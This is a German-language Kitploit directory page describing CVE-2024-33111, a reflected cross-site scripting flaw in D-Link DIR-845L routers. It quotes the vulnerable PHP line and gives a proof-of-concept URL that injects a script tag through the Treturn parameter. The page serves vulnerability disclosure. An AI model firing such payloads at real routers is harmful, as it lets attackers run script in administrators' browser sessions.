Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-33111 — Der D-Link DIR-845L Router ist anfällig für Cross Site Scripting (XSS) über /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
Tools/GitHubGitHub/fallenskill1/cve-2024-33111
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

Der D-Link DIR-845L Router ist anfällig für Cross Site Scripting (XSS) über /htdocs/webinc/js/bsc_sms_inbox.php.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-33111

D-Link DIR-845L-Router bis einschließlich Version 1.01KRb03 sind anfällig für Cross Site Scripting (XSS) über /htdocs/webinc/js/bsc_sms_inbox.php.

Anfällige Komponente

  • /htdocs/webinc/js/bsc_sms_inbox.php

Technische Details

Die Schwachstelle ist auf die fehlende Filterung des Parameters $_GET["Treturn"] zurückzuführen, der direkt im Code in Zeile 17 von bsc_sms_inbox.php verwendet wird.

Der verwundbare Codeausschnitt:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

Tool herunterladen